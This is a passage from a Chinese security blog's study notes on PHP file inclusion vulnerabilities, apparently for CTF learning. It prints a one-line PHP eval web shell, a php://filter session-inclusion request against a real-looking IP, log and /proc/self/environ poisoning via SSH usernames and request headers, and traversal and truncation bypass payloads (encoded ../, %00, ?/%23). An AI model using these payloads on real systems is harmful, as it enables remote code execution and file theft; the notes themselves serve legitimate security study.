<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">chybetachybetachybetachybetachybetachybetachybetachybetachybeta<span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;atebyhc&#x27;</span>]) <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>其base64加密后的长度为128，大于100。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">54.222</span>.<span class="hljs-number">188.152</span>:<span class="hljs-number">22589</span>/index.php<br>?action=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/read=convert.base64-decode/</span>resource=<span class="hljs-regexp">/var/</span>lib<span class="hljs-regexp">/php5/</span>sess_udu8pr09fjvabtoip8icgurt85<br>&amp;atebyhc=phpinfo();<br></code></pre></td></tr></table></figure>

<h3 id="包含日志"><a href="#包含日志" class="headerlink" title="包含日志"></a>包含日志</h3><h4 id="访问日志"><a href="#访问日志" class="headerlink" title="访问日志"></a>访问日志</h4><p>利用条件： 需要知道服务器日志的存储路径，且日志文件可读。</p>
<p>姿势：</p>
<p>很多时候，web服务器会将请求写入到日志文件中，比如说apache。</p>
<p><img src="D:\work\temp\PixPin_2025-09-09_19-28-40.png" srcset="/img/loading.gif" lazyload alt="PixPin_2025-09-09_19-28-40"></p>
<p>在用户发起请求时，会将请求写入access.log，当发生错误时将错误写入error.log。默认情况下，日志保存路径在 &#x2F;var&#x2F;log&#x2F;apache2&#x2F;。</p>
<p>但如果是直接发起请求，会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改。</p>
<p>正常的php代码已经写入了 &#x2F;var&#x2F;log&#x2F;apache2&#x2F;access.log。然后进行包含即可。</p>
<p>在一些场景中，log的地址是被修改掉的。你可以通过读取相应的配置文件后，再进行包含。</p>
<h4 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h4><p>利用条件：需要知道ssh-log的位置，且可读。默认情况下为 &#x2F;var&#x2F;log&#x2F;auth.log</p>
<p>姿势：</p>
<p>用ssh连接：</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">ubuntu@VM-207-93-ubuntu:~$ ssh &#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>(); <span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;@remotehost</span><br></code></pre></td></tr></table></figure>



<p>之后会提示输入密码等等，随便输入。</p>
<p>然后在remotehost的ssh-log中即可写入php代码：</p>
<p>之后进行文件包含即可。</p>
<h4 id="包含fd"><a href="#包含fd" class="headerlink" title="包含fd"></a>包含fd</h4><p>因为 Apache 的日志（比如错误日志）里会记录一些信息，比如请求头。<br> 所以攻击者可以把一段 PHP 代码（比如 <code>&lt;?php ... ?&gt;</code>）塞进 <strong>Referer 请求头</strong>，这样日志文件里就会出现这段代码。</p>
<p>如果网站有 LFI 漏洞，可以让它“包含”日志文件，那么日志里的 PHP 代码就会被执行。</p>
<p>包含 <strong>Apache 错误日志信息</strong> 的 proc 文件会在 <strong>&#x2F;proc&#x2F;self&#x2F;fd&#x2F;</strong> 下变化，例如 <strong>&#x2F;proc&#x2F;self&#x2F;fd&#x2F;2</strong>、**&#x2F;proc&#x2F;self&#x2F;fd&#x2F;10** 等。</p>
<h4 id="包含environ"><a href="#包含environ" class="headerlink" title="包含environ"></a>包含environ</h4><p>利用条件：</p>
<ol>
<li>php以cgi方式运行，这样environ才会保持UA头。</li>
<li>environ文件存储位置已知，且environ文件可读。</li>
</ol>
<p>姿势：</p>
<p>proc&#x2F;self&#x2F;environ中会保存user-agent头。如果在user-agent中插入php代码，则php代码会被写入到environ中。之后再包含它，即可。</p>
<h3 id="包含临时文件"><a href="#包含临时文件" class="headerlink" title="包含临时文件"></a>包含临时文件</h3><p>php中上传文件，会创建临时文件。在linux下使用&#x2F;tmp目录，而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前，利用竞争即可包含该临时文件。</p>
<p>由于包含需要知道包含的文件名。一种方法是进行暴力猜解，linux下使用的随机函数有缺陷，而window下只有65535中不同的文件名，所以这个方法是可行的。</p>
<p>另一种方法是配合phpinfo页面的php variables，可以直接获取到上传文件的存储路径和临时文件名，直接包含即可。</p>
<h4 id="例题-1"><a href="#例题-1" class="headerlink" title="例题"></a>例题</h4><p><a target="_blank" rel="noopener" href="https://chybeta.github.io/2017/08/22/XMAN%E5%A4%8F%E4%BB%A4%E8%90%A5-2017-babyweb-writeup/">XMAN夏令营-2017-babyweb-writeup | Chybeta</a></p>
<p>题目要求上传后缀为<code>.gif</code>或者<code>.jpg</code>的文件，它先将我们上传的文件保存到uploads文件夹下，然后sleep(2)，接着调用imagecreatefromgif等一系列操作。如果我们上传一个包含php代码的图片木马，在经过imagecreatefromgif等一系列操作后，正常情况下其中的php代码会被去掉，也就是说操作过后的图片已经不是图片木马了。不过由于存在sleep(2)，可以利用这个两秒的空隙，利用phar或者zip协议去包含我们上传的还未被删除的图片木马。</p>
<p><img src="D:\work\notebook\ontebook\CTF\web学习\文件包含漏洞\assets\PixPin_2025-09-10_21-42-06.png" srcset="/img/loading.gif" lazyload alt="PixPin_2025-09-10_21-42-06"></p>
<p>从上文中利用phar或者zip协议的方法，显然我们需要把一句话木马压缩为.zip。</p>
<p>上传时将其文件名改为k.jpg，类型改为image&#x2F;jpeg。在上传后访问<code>http://202.112.51.217:8199/uploads/</code>，去获取最新的文件名，然后用协议去包含。如果手动的话时间肯定会超过2s，所以需要用脚本。</p>
<h2 id="绕过姿势"><a href="#绕过姿势" class="headerlink" title="绕过姿势"></a>绕过姿势</h2><p>平常碰到的情况肯定不会是简简单单的<code>include $_GET[&#39;file&#39;];</code>这样直接把变量传入包含函数的。在很多时候包含的变量&#x2F;文件不是完全可控的，比如下面这段代码指定了前缀和后缀：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>	<span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;/var/www/html/&#x27;</span>.<span class="hljs-variable">$file</span>.<span class="hljs-string">&#x27;/test/test.php&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>这样就很“难”直接去包含前面提到的种种文件。</p>
<h3 id="指定前缀"><a href="#指定前缀" class="headerlink" title="指定前缀"></a>指定前缀</h3><p>先考虑一下指定了前缀的情况吧。测试代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>	<span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;/var/www/html/&#x27;</span>.<span class="hljs-variable">$file</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>



<h3 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h3><p>这个最简单了，简要的提一下。</p>
<p>现在在&#x2F;var&#x2F;log&#x2F;test.txt文件中有php代码<code>&lt;?php phpinfo();?&gt;</code>，则利用<code>../</code>可以进行目录遍历，比如我们尝试访问：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stata"><span class="hljs-keyword">include</span>.php?<span class="hljs-keyword">file</span>=../../<span class="hljs-keyword">log</span>/<span class="hljs-keyword">test</span>.txt<br></code></pre></td></tr></table></figure>



<p>则服务器端实际拼接出来的路径为：&#x2F;var&#x2F;www&#x2F;html&#x2F;..&#x2F;..&#x2F;log&#x2F;test.txt，也即&#x2F;var&#x2F;log&#x2F;test.txt。从而包含成功。</p>
<h3 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h3><p>服务器端常常会对于<code>../</code>等做一些过滤，可以用一些编码来进行绕过。</p>
<ul>
<li>利用url编码<ul>
<li>..&#x2F;<ul>
<li>%2e%2e%2f</li>
<li>..%2f</li>
<li>%2e%2e&#x2F;</li>
</ul>
</li>
<li>..\<ul>
<li>%2e%2e%5c</li>
<li>..%5c</li>
<li>%2e%2e\</li>
</ul>
</li>
</ul>
</li>
<li>二次编码<ul>
<li>..&#x2F;<ul>
<li>%252e%252e%252f</li>
</ul>
</li>
<li>..\<ul>
<li>%252e%252e%255c</li>
</ul>
</li>
</ul>
</li>
<li>容器&#x2F;服务器的编码方式<ul>
<li>..&#x2F;<ul>
<li>..%c0%af<ul>
<li>注：<a target="_blank" rel="noopener" href="https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work">Why does Directory traversal attack %C0%AF work?</a></li>
</ul>
</li>
<li>%c0%ae%c0%ae&#x2F;<ul>
<li>注：java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点）</li>
<li>Apache Tomcat Directory Traversal</li>
</ul>
</li>
</ul>
</li>
<li>..\<ul>
<li>..%c1%9c</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="指定后缀"><a href="#指定后缀" class="headerlink" title="指定后缀"></a>指定后缀</h3><p>接着考虑指定后缀的情况。测试代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>	<span class="hljs-keyword">include</span> <span class="hljs-variable">$file</span>.<span class="hljs-string">&#x27;/test/test.php&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="URL"><a href="#URL" class="headerlink" title="URL"></a>URL</h3><p>url格式：</p>
<h4 id="姿势一：query（？）"><a href="#姿势一：query（？）" class="headerlink" title="姿势一：query（？）"></a>姿势一：query（？）</h4><p>原理：浏览器或服务器会把 <code>?.php</code> 当成“请求参数”，而不是文件名的一部分。</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">index</span>.php?<span class="hljs-keyword">file</span>=http:<span class="hljs-comment">//remoteaddr/remoteinfo.txt?</span><br></code></pre></td></tr></table></figure>



<h4 id="姿势二：fragment（-）"><a href="#姿势二：fragment（-）" class="headerlink" title="姿势二：fragment（#）"></a>姿势二：fragment（#）</h4><p>原理：URL 里的 <code>#</code> 表示 <strong>片段定位符（fragment）</strong>，浏览器只在本地解析，不会传给远程服务器。</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">index</span>.php?<span class="hljs-keyword">file</span>=http:<span class="hljs-comment">//remoteaddr/remoteinfo.txt%23</span><br></code></pre></td></tr></table></figure>



<h3 id="利用协议"><a href="#利用协议" class="headerlink" title="利用协议"></a>利用协议</h3><p>前面有提到过利用zip协议和phar协议。</p>
<h3 id="长度截断"><a href="#长度截断" class="headerlink" title="长度截断"></a>长度截断</h3><p>利用条件： php版本 &lt; php 5.2.8</p>
<p>目录字符串，在linux下4096字节时会达到最大值，在window下是256字节。只要不断的重复<code>./</code></p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">index.php?<span class="hljs-keyword">file</span>=.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>。。。省略。。。.<span class="hljs-regexp">/./</span>shell.txt<br></code></pre></td></tr></table></figure>



<p>则后缀<code>/test/test.php</code>，在达到最大值后会被直接丢弃掉。</p>
<h3 id="0字节截断"><a href="#0字节截断" class="headerlink" title="0字节截断"></a>0字节截断</h3><p>利用条件： php版本 &lt; php 5.3.4</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">index</span>.php?<span class="hljs-keyword">file</span>=phpinfo.txt<span class="hljs-number">%00</span><br></code></pre></td></tr></table></figure>

<p>能利用00截断的场景现在应该很少了：）</p>
<h1 id="Reffeerence"><a href="#Reffeerence" class="headerlink" title="Reffeerence"></a>Reffeerence</h1><p><a target="_blank" rel="noopener" href="https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/#%E5%8C%85%E5%90%ABsession">php文件包含漏洞 | Chybeta</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_46467017/article/details/126380415">文件包含漏洞全面详解-CSDN博客</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" class="category-chain-item">基础知识</a>
  
  

      </span>
    
  
    
      <span class="category-chain">
        
  <a href="/categories/web/" class="category-chain-item">web</a>
  
  

      </span>
    
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%AE%9E%E6%93%8D/" class="category-chain-item">实操</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" class="print-no-link">#文件包含</a>
      
        <a href="/tags/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" class="print-no-link">#php伪协议</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>文件包含漏洞学习</div>
      <div>http://example.com/2025/10/16/文件包含漏洞学习/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>everythingis-ok</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月16日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/07/21/Flask-SSTI-labs-%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/" title="Flask-SSTI-labs 通关记录">
                        <span class="hidden-mobile">Flask-SSTI-labs 通关记录</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
